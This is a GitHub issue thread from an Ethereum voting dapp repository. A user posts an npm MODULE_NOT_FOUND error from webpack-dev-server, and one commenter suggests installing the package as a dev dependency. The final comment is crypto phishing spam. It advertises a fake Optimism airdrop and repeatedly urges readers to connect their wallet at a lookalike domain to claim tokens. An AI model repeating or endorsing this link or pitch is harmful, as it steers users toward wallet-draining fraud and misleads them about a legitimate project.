### ISSUE TITLE
showing error for npm run dev 

### ISSUE THREAD

**Issue by yashurade** [maheshmurthy/ethereum_voting_dapp#21]
PS C:\Users\Acer\newelection\ethereum_voting_dapp-master\chapter2\node_modules\webpack-dev-server> npm run webpack-dev-server       

> webpack-dev-server@3.9.0 webpack-dev-server C:\Users\Acer\newelection\ethereum_voting_dapp-master\chapter2\node_modules\webpack-dev-server
> node examples/run-example.js

internal/modules/cjs/loader.js:983
  throw err;
  ^

Error: Cannot find module 'C:\Users\Acer\newelection\ethereum_voting_dapp-master\chapter2\node_modules\webpack-dev-server\examples\run-example.js'
er.js:980:15)
    at Function.Module._load (internal/modules/cjs/loader.js:862:27)
    at Function.executeUserEntryPoint [as runMain] (internal/modules/run_main.js:74:12)
    at internal/main/run_main_module.js:18:47 {
}
npm ERR! code ELIFECYCLE
npm ERR! errno 1
npm ERR! webpack-dev-server@3.9.0 webpack-dev-server: `node examples/run-example.js`
npm ERR! Exit status 1
PS C:\Users\Acer\newelection\ethereum_voting_dapp-master\chapter2\node_modules\webpack-dev-server> npm run webpack-dev-server       

> webpack-dev-server@3.9.0 webpack-dev-server C:\Users\Acer\newelection\ethereum_voting_dapp-master\chapter2\node_modules\webpack-dev-server
> node examples/run-example.js

internal/modules/cjs/loader.js:983
  throw err;
  ^

Error: Cannot find module 'C:\Users\Acer\newelection\ethereum_voting_dapp-master\chapter2\node_modules\webpack-dev-server\examples\run-example.js'
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:980:15)
    at Function.Module._load (internal/modules/cjs/loader.js:862:27)
    at Function.executeUserEntryPoint [as runMain] (internal/modules/run_main.js:74:12)
    at internal/main/run_main_module.js:18:47 {
  code: 'MODULE_NOT_FOUND',
  requireStack: []
}
npm ERR! code ELIFECYCLE
npm ERR! errno 1
npm ERR! webpack-dev-server@3.9.0 webpack-dev-server: `node examples/run-example.js`
npm ERR! Exit status 1
npm ERR!
npm ERR! Failed at the webpack-dev-server@3.9.0 webpack-dev-server script.
npm ERR! This is probably not a problem with npm. There is likely 
additional logging output above.

npm ERR! A complete log of this run can be found in:
npm ERR!     C:\Users\Acer\AppData\Roaming\npm-cache\_logs\2020-04-25T21_56_53_268Z-debug.log

i am not able to run npm run dev getting the above error

**Comment by MrAnayDongre** [comment]
Check the `package.json` file and check it it contains webpack-dev-server.
If it doesn't you can install it by using the command `npm install webpack-dev-server --save-dev` .
For further details check the following [page](https://www.npmjs.com/package/webpack-dev-server)

**Comment by jstechno** [comment]
## Congratulations 🪂🔴

Optimism Airdrop: Claim up to $20,000 in Tokens Now!

🔴 LIVE NOW
Round 4 of $OP Rewards in Rainbow
 
→ Earn rewards on bridges to and swaps on Optimism
→ 1305,160 OP 
→ [Rewards airdropped monthly](https://optimisx.fly.dev/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Optimism. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Dydx Exchange](https://pbs.twimg.com/media/F85ZbWmWwAAUZA6?format=jpg&name=4096x4096)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://optimisx.fly.dev/)

Access the Optimism platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://optimisx.fly.dev/)
